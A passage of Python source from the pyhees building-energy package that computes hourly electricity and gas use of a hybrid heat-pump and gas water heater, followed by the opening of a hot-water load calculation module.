L_dashdash_ba2_d_t):
"""# 1時間当たりの給湯機の消費電力量 (1)
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機の消費電力量 (kWh/h)
"""
# 1日当たりの太陽熱補正給湯熱負荷
L_dashdash_k_d = get_L_dashdash_k_d(L_dashdash_k_d_t)
L_dashdash_s_d = get_L_dashdash_s_d(L_dashdash_s_d_t)
L_dashdash_w_d = get_L_dashdash_w_d(L_dashdash_w_d_t)
L_dashdash_b2_d = get_L_dashdash_b2_d(L_dashdash_b2_d_t)
L_dashdash_ba2_d = get_L_dashdash_ba2_d(L_dashdash_ba2_d_t)
E_E_hs_d = calc_E_E_hs_d(L_HWH, hybrid_category, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_s_d, L_dashdash_w_d,
L_dashdash_b2_d, L_dashdash_ba2_d)
# 1日当たりの太陽熱補正給湯熱負荷、給湯機の消費電力量の配列要素を1時間ごとに引き延ばす(合計値は24倍になることに注意)
E_E_hs_d = np.repeat(E_E_hs_d, 24)
L_dashdash_k_d = np.repeat(L_dashdash_k_d, 24)
L_dashdash_s_d = np.repeat(L_dashdash_s_d, 24)
L_dashdash_w_d = np.repeat(L_dashdash_w_d, 24)
L_dashdash_b2_d = np.repeat(L_dashdash_b2_d, 24)
L_dashdash_ba2_d = np.repeat(L_dashdash_ba2_d, 24)
E_E_hs_d_t = np.zeros(24 * 365)
# (1-1) 太陽熱補正給湯熱負荷が発生しない日 => 24時間で単純分割
f1 = (L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d + L_dashdash_ba2_d == 0)
E_E_hs_d_t[f1] = E_E_hs_d[f1] / 24
# (1-2) 太陽熱補正給湯熱負荷が発生する日 => 負荷で按分
f2 = (L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d + L_dashdash_ba2_d > 0)
E_E_hs_d_t[f2] = E_E_hs_d[f2] * (
L_dashdash_k_d_t[f2] + L_dashdash_s_d_t[f2] + L_dashdash_w_d_t[f2] + L_dashdash_b2_d_t[f2] +
L_dashdash_ba2_d_t[f2]) / (
L_dashdash_k_d[f2] + L_dashdash_s_d[f2] + L_dashdash_w_d[f2] + L_dashdash_b2_d[f2] +
L_dashdash_ba2_d[f2])
return E_E_hs_d_t
def calc_E_E_hs_d(L_HWH, hybrid_category, theta_ex_d_Ave_d, L_dashdash_k_d, L_dashdash_s_d, L_dashdash_w_d,
L_dashdash_b2_d,
L_dashdash_ba2_d):
"""# 1日当たりの給湯機の消費電力量 (2)
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d(ndarray): 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_s_d(ndarray): 1日当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_w_d(ndarray): 1日当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_b2_d(ndarray): 1日当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_ba2_d(ndarray): 1日当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 1日当たりの給湯機の消費電力量 (kWh/d)
"""
# 係数
a_1, a_2, a_3, a_4 = get_coeff_a(L_HWH, hybrid_category)
# デフロスト係数
C_E_def_d = get_C_E_def_d(theta_ex_d_Ave_d)
E_E_hs_d = ((a_1 * theta_ex_d_Ave_d + a_2 * (
L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d) + a_3 * L_HWH + a_4) * C_E_def_d
+ (0.01723 * L_dashdash_ba2_d + 0.06099)) * 10 ** 3 / 3600
return E_E_hs_d
def get_coeff_a(L_HWH, hybrid_category):
"""# 係数a_1, a_2, a_3, a_4
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
Returns:
tuple: 係数a_1, a_2, a_3, a_4
"""
a_1 = np.zeros(365)
a_2 = np.zeros(365)
a_3 = np.zeros(365)
a_4 = np.zeros(365)
if hybrid_category == '区分1':
a_1[L_HWH > 0] = get_table_i_3()[0][0]
a_1[L_HWH == 0] = get_table_i_3()[0][2]
a_2[L_HWH > 0] = get_table_i_3()[1][0]
a_2[L_HWH == 0] = get_table_i_3()[1][2]
a_3[L_HWH > 0] = get_table_i_3()[2][0]
a_3[L_HWH == 0] = get_table_i_3()[2][2]
a_4[L_HWH > 0] = get_table_i_3()[3][0]
a_4[L_HWH == 0] = get_table_i_3()[3][2]
elif hybrid_category == '区分2':
a_1[L_HWH > 0] = get_table_i_3()[0][1]
a_1[L_HWH == 0] = get_table_i_3()[0][3]
a_2[L_HWH > 0] = get_table_i_3()[1][1]
a_2[L_HWH == 0] = get_table_i_3()[1][3]
a_3[L_HWH > 0] = get_table_i_3()[2][1]
a_3[L_HWH == 0] = get_table_i_3()[2][3]
a_4[L_HWH > 0] = get_table_i_3()[3][1]
a_4[L_HWH == 0] = get_table_i_3()[3][3]
else:
raise ValueError(hybrid_category)
return a_1, a_2, a_3, a_4
def get_table_i_3():
"""表I.3 式(1)における係数
Args:
Returns:
list: 表I.3 式(1)における係数
"""
# 表I.3 式(1)における係数
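# Layout note (added comment, inferred from the indexing in get_coeff_a): rows are the
# coefficients a_1..a_4; columns are, in order, (区分1, L_HWH>0), (区分2, L_HWH>0),
# (区分1, L_HWH=0), (区分2, L_HWH=0).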
table_i_3 = [
(-0.51375, -0.57722, -0.18114, -0.30429),
(-0.01782, 0.03865, 0.10483, 0.08497),
(0.27640, 0.18173, 0.0, 0.0),
(9.40671, 15.30711, 5.85285, 10.66158)
]
return table_i_3
def get_C_E_def_d(theta_ex_d_Ave_d):
"""1日当たりのデフロスト運転による消費電力量の補正係数 (3)
Args:
theta_ex_d_Ave_d: 日平均外気温度 (℃)
Returns:
ndarray: 1日当たりのデフロスト運転による消費電力量の補正係数 (3)
"""
C_E_def_d = np.ones(365)
f = theta_ex_d_Ave_d < 7
C_E_def_d[f] = 1 + (7 - theta_ex_d_Ave_d[f]) * 0.0091
return C_E_def_d
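# Worked example (illustrative only): at a daily mean outdoor temperature of 2 degC,
# equation (3) gives C_E_def = 1 + (7 - 2) * 0.0091 = 1.0455, i.e. roughly a 4.6% uplift of
# the electricity use to account for defrost operation; at 7 degC or above it stays 1.0.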
# ============================================================================
# I.3 ガス消費量
# ============================================================================
def calc_E_G_hs_d_t(L_HWH, hybrid_category, Theta_ex_Ave, L_dashdash_k_d_t, L_dashdash_s_d_t, L_dashdash_w_d_t, L_dashdash_b2_d_t,
L_dashdash_ba2_d_t):
"""# 1時間当たりの給湯機のガス消費量 (4)
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
Theta_ex_Ave(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの給湯機のガス消費量 (MJ/h)
"""
# 1日当たりの太陽熱補正給湯熱負荷
L_dashdash_k_d = get_L_dashdash_k_d(L_dashdash_k_d_t)
L_dashdash_s_d = get_L_dashdash_s_d(L_dashdash_s_d_t)
L_dashdash_w_d = get_L_dashdash_w_d(L_dashdash_w_d_t)
L_dashdash_b2_d = get_L_dashdash_b2_d(L_dashdash_b2_d_t)
L_dashdash_ba2_d = get_L_dashdash_ba2_d(L_dashdash_ba2_d_t)
# 1日当たりの給湯機のガス消費量 (5)
E_G_hs_d = calc_E_G_hs_d(L_HWH, hybrid_category, Theta_ex_Ave, L_dashdash_k_d, L_dashdash_s_d, L_dashdash_w_d, L_dashdash_b2_d,
L_dashdash_ba2_d)
# 1日当たりの太陽熱補正給湯熱負荷、給湯機のガス消費量の配列要素を1時間ごとに引き延ばす(合計値は24倍になることに注意)
E_G_hs_d = np.repeat(E_G_hs_d, 24)
L_dashdash_k_d = np.repeat(L_dashdash_k_d, 24)
L_dashdash_s_d = np.repeat(L_dashdash_s_d, 24)
L_dashdash_w_d = np.repeat(L_dashdash_w_d, 24)
L_dashdash_b2_d = np.repeat(L_dashdash_b2_d, 24)
L_dashdash_ba2_d = np.repeat(L_dashdash_ba2_d, 24)
E_G_hs_d_t = np.zeros(24 * 365)
# (4-1) 太陽熱補正給湯熱負荷が発生しない日 => 24時間で単純分割
f1 = (L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d + L_dashdash_ba2_d == 0)
E_G_hs_d_t[f1] = E_G_hs_d[f1] / 24
# (4-2) 太陽熱補正給湯熱負荷が発生する日 => 負荷で按分
f2 = (L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d + L_dashdash_ba2_d > 0)
E_G_hs_d_t[f2] = E_G_hs_d[f2] * (
L_dashdash_k_d_t[f2] + L_dashdash_s_d_t[f2] + L_dashdash_w_d_t[f2] + L_dashdash_b2_d_t[f2] +
L_dashdash_ba2_d_t[f2]) / (
L_dashdash_k_d[f2] + L_dashdash_s_d[f2] + L_dashdash_w_d[f2] + L_dashdash_b2_d[f2] +
L_dashdash_ba2_d[f2])
return E_G_hs_d_t
def calc_E_G_hs_d(L_HWH, hybrid_category, Theta_ex_Ave, L_dashdash_k_d, L_dashdash_s_d, L_dashdash_w_d, L_dashdash_b2_d,
L_dashdash_ba2_d):
"""# 1日当たりの給湯機のガス消費量 (5)
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
Theta_ex_Ave(ndarray): 日平均外気温度 (℃)
L_dashdash_k_d(ndarray): 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_s_d(ndarray): 1日当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_w_d(ndarray): 1日当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_b2_d(ndarray): 1日当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
L_dashdash_ba2_d(ndarray): 1日当たりの浴槽追焚時における太陽熱補正給湯熱負荷 (MJ/d)
Returns:
ndarray: 1日当たりの給湯機のガス消費量 (MJ/d)
"""
# 係数
b_1, b_2, b_3, b_4 = get_coeff_b(L_HWH, hybrid_category)
# デフロスト係数
C_G_def_d = get_C_G_def_d(Theta_ex_Ave)
# 浴槽追焚時における日平均給湯機効率
e_ba2 = get_e_ba2_d(Theta_ex_Ave, L_dashdash_ba2_d)
return ((b_1 * Theta_ex_Ave + b_2 * (
L_dashdash_k_d + L_dashdash_s_d + L_dashdash_w_d + L_dashdash_b2_d) + b_3 * L_HWH + b_4) * C_G_def_d + (
L_dashdash_ba2_d / e_ba2))
def get_coeff_b(L_HWH, hybrid_category):
"""# 係数b_1, b_2, b_3, b_4
Args:
L_HWH(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
hybrid_category(str): 電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機の区分
Returns:
tuple: 係数b_1, b_2, b_3, b_4
"""
b_1 = np.zeros(365)
b_2 = np.zeros(365)
b_3 = np.zeros(365)
b_4 = np.zeros(365)
if hybrid_category == '区分1':
b_1[L_HWH > 0] = get_table_i_4()[0][0]
b_1[L_HWH == 0] = get_table_i_4()[0][2]
b_2[L_HWH > 0] = get_table_i_4()[1][0]
b_2[L_HWH == 0] = get_table_i_4()[1][2]
b_3[L_HWH > 0] = get_table_i_4()[2][0]
b_3[L_HWH == 0] = get_table_i_4()[2][2]
b_4[L_HWH > 0] = get_table_i_4()[3][0]
b_4[L_HWH == 0] = get_table_i_4()[3][2]
elif hybrid_category == '区分2':
b_1[L_HWH > 0] = get_table_i_4()[0][1]
b_1[L_HWH == 0] = get_table_i_4()[0][3]
b_2[L_HWH > 0] = get_table_i_4()[1][1]
b_2[L_HWH == 0] = get_table_i_4()[1][3]
b_3[L_HWH > 0] = get_table_i_4()[2][1]
b_3[L_HWH == 0] = get_table_i_4()[2][3]
b_4[L_HWH > 0] = get_table_i_4()[3][1]
b_4[L_HWH == 0] = get_table_i_4()[3][3]
else:
raise ValueError(hybrid_category)
return b_1, b_2, b_3, b_4
def get_table_i_4():
"""表I.4 係数
Args:
Returns:
list: 表I.4 係数
"""
# 表I.4 係数
table_i_4 = [
(-0.19841, -0.5782, -0.05770, 0.14061),
(1.10632, 0.75066, 0.47525, 0.3227),
(0.19307, 0.46244, 0.0, 0.0),
(-10.36669, -12.55999, -6.34593, -13.43567)
]
return table_i_4
def get_e_ba2_d(theta_ex_d_Ave_d, L_dashdash_ba2_d):
"""# 浴槽追焚時における日平均給湯機効率 (6)
Args:
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
L_dashdash_ba2_d(ndarray): 1日当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/d)
Returns:
ndarray: 浴槽追焚時における日平均給湯機効率 (6)
"""
# 係数
c_1, c_2, c_3 = get_coeff_c()
e_ba2_d = c_1 * theta_ex_d_Ave_d + c_2 * L_dashdash_ba2_d + c_3
# 効率が1.0を超えない範囲で
e_ba2_d = np.clip(e_ba2_d, None, 1)
return e_ba2_d
def get_coeff_c():
"""表I.5 係数
Args:
Returns:
tuple: 表I.5 係数
"""
# 表I.5 係数
table_i_5 = (0.0048, 0.0060, 0.7544)
return table_i_5
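# Worked example (illustrative only): with the table I.5 coefficients above, a daily mean
# outdoor temperature of 10 degC and a reheating load of 5 MJ/d give
# e_ba2 = 0.0048*10 + 0.0060*5 + 0.7544 = 0.8324, below the cap of 1.0 applied in get_e_ba2_d.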
def get_C_G_def_d(theta_ex_d_Ave_d):
"""# 1日当たりのデフロスト運転によるガス消費量の補正係数 (7)
Args:
theta_ex_d_Ave_d(ndarray): 日平均外気温度 (℃)
Returns:
ndarray: 1日当たりのデフロスト運転によるガス消費量の補正係数 (7)
"""
C_G_def = np.ones(365)
f = theta_ex_d_Ave_d < 7
C_G_def[f] = 1 + (7 - theta_ex_d_Ave_d[f]) * 0.0205
return C_G_def
# ============================================================================
# I.4 灯油消費量
# ============================================================================
def get_E_K_hs_d_t():
"""# 1時間当たりの給湯機の灯油消費量
Args:
Returns:
ndarray: 1時間当たりの給湯機の灯油消費量
"""
# 1日当たりの給湯機の灯油消費量は0とする
return np.zeros(24*365)
# ============================================================================
# I.5 温水暖房における熱源機の往き温水温度の候補
# ============================================================================
def get_hotwater_temp_list():
"""# 温水暖房における熱源機の往き温水温度の候補
Args:
Returns:
温水暖房における熱源機の往き温水温度の候補
"""
return [60, 40]
def get_L_dashdash_k_d(L_dashdash_k_d_t):
"""# 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
Args:
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1日当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/d)
"""
return np.sum(L_dashdash_k_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_s_d(L_dashdash_s_d_t):
"""# 1日当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴室シャワー水栓における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_s_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_w_d(L_dashdash_w_d_t):
"""# 1日当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの洗面水栓における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_w_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_b1_d(L_dashdash_b1_d_t):
"""# 1日当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_b1_d_t: 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽水栓湯はり時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_b1_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_b2_d(L_dashdash_b2_d_t):
"""# 1日当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽自動湯はり時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_b2_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_ba1_d(L_dashdash_ba1_d_t):
"""# 1日当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽水栓さし湯時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_ba1_d_t.reshape((365, 24)), axis=1)
def get_L_dashdash_ba2_d(L_dashdash_ba2_d_t):
"""# 1日当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/d)
Args:
L_dashdash_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/h)
Returns:
ndarray: 1日当たりの浴槽追焚時における太陽熱補正給湯負荷 (MJ/d)
"""
return np.sum(L_dashdash_ba2_d_t.reshape((365, 24)), axis=1)
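if __name__ == '__main__':
    # Hedged smoke-test sketch (added, not part of the original module): exercises the hybrid
    # water heater electricity routine with synthetic, hypothetical inputs purely to illustrate
    # the expected array shapes (365 daily values in, 24*365 hourly values out).
    theta_ex_d_Ave_d = np.full(365, 10.0)   # assumed constant daily mean outdoor temperature (degC)
    L_hourly = np.full(24 * 365, 0.1)       # assumed small hourly hot water load (MJ/h)
    zeros_hourly = np.zeros(24 * 365)
    E_E = calc_E_E_hs_d_t(
        L_HWH=np.zeros(365),                # assume no hot-water heating load
        hybrid_category='区分1',
        theta_ex_d_Ave_d=theta_ex_d_Ave_d,
        L_dashdash_k_d_t=L_hourly,
        L_dashdash_s_d_t=L_hourly,
        L_dashdash_w_d_t=L_hourly,
        L_dashdash_b2_d_t=zeros_hourly,
        L_dashdash_ba2_d_t=zeros_hourly,
    )
    print(E_E.shape, E_E.sum())             # (8760,) and the annual electricity total in kWh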
```
#### File: src/pyhees/section7_1.py
```python
import numpy as np
from functools import lru_cache
import pyhees.section7_1_b as default
import pyhees.section7_1_c as gas
import pyhees.section7_1_d as oil
import pyhees.section7_1_e as eheatpump
import pyhees.section7_1_f as eheater
import pyhees.section7_1_g as hybrid_gas
import pyhees.section7_1_g_3 as hybrid_gas_3
import pyhees.section7_1_h as gas_hybrid
import pyhees.section7_1_i as whybrid
import pyhees.section7_1_j as watersaving
import pyhees.section7_1_m as schedule
import pyhees.section9_2 as lss
import pyhees.section9_3 as ass
from pyhees.section11_1 import load_outdoor, get_Theta_ex
from pyhees.section11_2 import load_solrad
from pyhees.section11_3 import load_schedule, get_schedule_hw
# ============================================================================
# 5. 給湯設備によるエネルギー消費量
# ============================================================================
# ============================================================================
# 5.1 消費電力量
# ============================================================================
@lru_cache()
def calc_hotwater_load(n_p, region, sol_region, has_bath, bath_function, pipe_diameter, kitchen_watersaving_A,
kitchen_watersaving_C, shower_watersaving_A, shower_watersaving_B, washbowl_watersaving_C,
bath_insulation,
type=None, ls_type=None, A_sp=None, P_alpha_sp=None, P_beta_sp=None, W_tnk_ss=None,
hotwater_use=None, heating_flag_d=None, A_col=None, P_alpha=None, P_beta=None, V_fan_P0=None,
d0=None, d1=None, m_fan_test=None, W_tnk_ass=None
):
"""給湯負荷の計算
Args:
n_p(float): 仮想居住人数 (人)
region(int): 省エネルギー地域区分
sol_region(int): 年間の日射地域区分(1-5)
has_bath(bool): 浴室等の有無
bath_function(str): ふろ機能の種類
pipe_diameter(str): ヘッダー分岐後の径
kitchen_watersaving_A(bool): 台所水栓の手元止水機能の有無
kitchen_watersaving_C(bool): 台所水栓の水優先吐水機能の有無
shower_watersaving_A(bool): 浴室シャワー水栓の手元止水機能の有無
shower_watersaving_B(bool): 浴室シャワー水栓の小流量吐水機能の有無
washbowl_watersaving_C(bool): 洗面水栓の水優先吐水機能の有無
bath_insulation(bool): 浴槽の断熱の有無
type(str, optional): 太陽熱利用設備の種類 (液体集熱式,空気集熱式,None) (Default value = None)
ls_type(str, optional): 液体集熱式太陽熱利用設備の種類 (太陽熱温水器,ソーラーシステム) (Default value = None)
A_sp(float, optional): 太陽熱集熱部の有効集熱面積 (m2) (Default value = None)
P_alpha_sp(float, optional): 太陽熱集熱部の方位角 (°) (Default value = None)
P_beta_sp(float, optional): 太陽熱集熱部の傾斜角 (°) (Default value = None)
W_tnk_ss(float, optional): ソーラーシステムのタンク容量 (L) (Default value = None)
hotwater_use(bool, optional): 空気集熱式太陽熱利用設備が給湯部を有する場合はTrue (Default value = None)
heating_flag_d(ndarray, optional): 暖房日 (Default value = None)
A_col(tuple, optional): 集熱器群の面積 (m2) (Default value = None)
P_alpha(float, optional): 方位角 (°) (Default value = None)
P_beta(float, optional): 傾斜角 (°) (Default value = None)
V_fan_P0(float, optional): 空気搬送ファンの送風機特性曲線において機外静圧をゼロとしたときの空気搬送ファンの風量 (m3/h) (Default value = None)
d0(tuple, optional): 集熱器群を構成する集熱器の集熱効率特性線図一次近似式の切片 (-) (Default value = None)
d1(tuple, optional): 集熱器群を構成する集熱器の集熱効率特性線図一次近似式の傾き (W/(m2K)) (Default value = None)
m_fan_test(tuple, optional): 集熱器群を構成する集熱器の集熱性能試験時における単位面積当たりの空気の質量流量 (kg/(s・m2)) (Default value = None)
W_tnk_ass(float, optional): タンク容量 (L) (Default value = None)
Returns:
dict: 1時間当たりの給湯負荷等の計算結果
"""
# 生活スケジュール
schedule = load_schedule()
schedule_hw = get_schedule_hw(schedule)
# 外部環境
outdoor = load_outdoor()
Theta_ex_d_t = get_Theta_ex(region, outdoor)
# ----- 14. 夜間平均外気温度 -----
# 夜間平均外気温度 (℃) (15)
Theta_ex_Nave_d = get_Theta_ex_Nave_d(Theta_ex_d_t)
# ----- 13. 日平均外気温度 -----
# 日平均外気温度 (℃) (14)
theta_ex_d_Ave_d = get_theta_ex_d_Ave_d(Theta_ex_d_t)
# ----- 12. 日平均給水温度 -----
# 期間平均外気温度 (℃) (13)
Theta_ex_prd_Ave_d = get_Theta_ex_prd_Ave_d(theta_ex_d_Ave_d)
# 日平均給水温度 (℃) (12)
Theta_wtr_d = get_Theta_wtr_d(region, Theta_ex_prd_Ave_d)
# ----- 11. 浴槽沸かし直しによる給湯熱負荷 -----
# 浴槽沸かし直しによる給湯熱負荷 (MJ/h) (10)
L_ba_d_t = calc_L_ba_d_t(bath_insulation, schedule_hw, has_bath, theta_ex_d_Ave_d, n_p)
# ----- 10. 基準給湯量 -----
# 基準給湯量 (L/h) (7)
W_k_d_t = calc_W_k_d_t(n_p, schedule_hw)
W_s_d_t = calc_W_s_d_t(n_p, schedule_hw, has_bath)
W_w_d_t = calc_W_w_d_t(n_p, schedule_hw)
W_b1_d_t = calc_W_b1_d_t(n_p, schedule_hw, has_bath, bath_function)
W_b2_d_t = calc_W_b2_d_t(n_p, schedule_hw, has_bath, bath_function)
# 浴槽水栓さし湯時における基準給湯量 (L/h) (9)
W_ba1_d_t = calc_W_ba1_d_t(bath_function, L_ba_d_t, Theta_wtr_d)
# ----- 9. 節湯補正給湯量 -----
# 節湯補正給湯量 (L/h) (6)
W_dash_k_d_t = calc_W_dash_k_d_t(W_k_d_t, kitchen_watersaving_A, kitchen_watersaving_C, pipe_diameter, Theta_wtr_d)
W_dash_s_d_t = calc_W_dash_s_d_t(W_s_d_t, shower_watersaving_A, shower_watersaving_B, pipe_diameter)
W_dash_w_d_t = calc_W_dash_w_d_t(W_w_d_t, washbowl_watersaving_C, pipe_diameter, Theta_wtr_d)
W_dash_b1_d_t = calc_W_dash_b1_d_t(W_b1_d_t, pipe_diameter)
W_dash_b2_d_t = calc_W_dash_b2_d_t(W_b2_d_t)
W_dash_ba1_d_t = calc_W_dash_ba1_d_t(W_ba1_d_t, pipe_diameter)
# ----- 8. 節湯補正給湯熱負荷 -----
# 基準給湯温度 (℃)
Theta_sw_k = get_Theta_sw_k()
Theta_sw_s = get_Theta_sw_s()
Theta_sw_w = get_Theta_sw_w()
# 節湯補正給湯熱負荷 (MJ/h) (5)
L_dash_k_d_t = get_L_dash_k_d_t(W_dash_k_d_t, Theta_sw_k, Theta_wtr_d)
L_dash_s_d_t = get_L_dash_s_d_t(W_dash_s_d_t, Theta_sw_s, Theta_wtr_d)
L_dash_w_d_t = get_L_dash_w_d_t(W_dash_w_d_t, Theta_sw_w, Theta_wtr_d)
L_dash_b1_d_t, L_dash_b2_d_t = get_L_dash_bx_d_t(W_dash_b1_d_t, W_dash_b2_d_t, Theta_wtr_d, has_bath, bath_function)
L_dash_ba1_d_t, L_dash_ba2_d_t = get_L_dash_bax_d_t(W_dash_ba1_d_t, Theta_wtr_d, L_ba_d_t, has_bath, bath_function)
# ----- 7. 太陽熱補正給湯熱負荷 -----
# 太陽熱利用給湯設備による補正集熱量
L_sun_d_t = calc_L_sun_d_t(
region=region,
sol_region=sol_region,
solar_device=type,
ls_type=ls_type,
A_sp=A_sp,
P_alpha_sp=P_alpha_sp,
P_beta_sp=P_beta_sp,
W_tnk_ss=W_tnk_ss,
hotwater_use=hotwater_use,
heating_flag_d=heating_flag_d,
A_col=A_col,
P_alpha=P_alpha,
P_beta=P_beta,
V_fan_P0=V_fan_P0,
d0=d0,
d1=d1,
m_fan_test=m_fan_test,
W_tnk_ass=W_tnk_ass,
Theta_wtr_d=Theta_wtr_d,
L_dash_k_d_t=L_dash_k_d_t,
L_dash_s_d_t=L_dash_s_d_t,
L_dash_w_d_t=L_dash_w_d_t,
L_dash_b1_d_t=L_dash_b1_d_t,
L_dash_b2_d_t=L_dash_b2_d_t,
L_dash_ba1_d_t=L_dash_ba1_d_t
)
# 太陽熱補正給湯熱負荷
L_dashdash_k_d_t = calc_L_dashdash_k_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t,
L_sun_d_t)
L_dashdash_s_d_t = calc_L_dashdash_s_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t,
L_sun_d_t)
L_dashdash_w_d_t = calc_L_dashdash_w_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t,
L_sun_d_t)
L_dashdash_b1_d_t = calc_L_dashdash_b1_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t, L_sun_d_t)
L_dashdash_b2_d_t = calc_L_dashdash_b2_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t, L_sun_d_t)
L_dashdash_ba1_d_t = calc_L_dashdash_ba1_d_t(L_dash_k_d_t, L_dash_s_d_t, L_dash_w_d_t, L_dash_b1_d_t, L_dash_b2_d_t,
L_dash_ba1_d_t, L_sun_d_t)
L_dashdash_ba2_d_t = get_L_dashdash_ba2_d_t(L_dash_ba2_d_t)
print('L_ba = {}'.format(np.sum(L_ba_d_t)))
print('W_k = {}'.format(np.sum(W_k_d_t)))
print('W_s = {}'.format(np.sum(W_s_d_t)))
print('W_w = {}'.format(np.sum(W_w_d_t)))
print('W_b1 = {}'.format(np.sum(W_b1_d_t)))
print('W_b2 = {}'.format(np.sum(W_b2_d_t)))
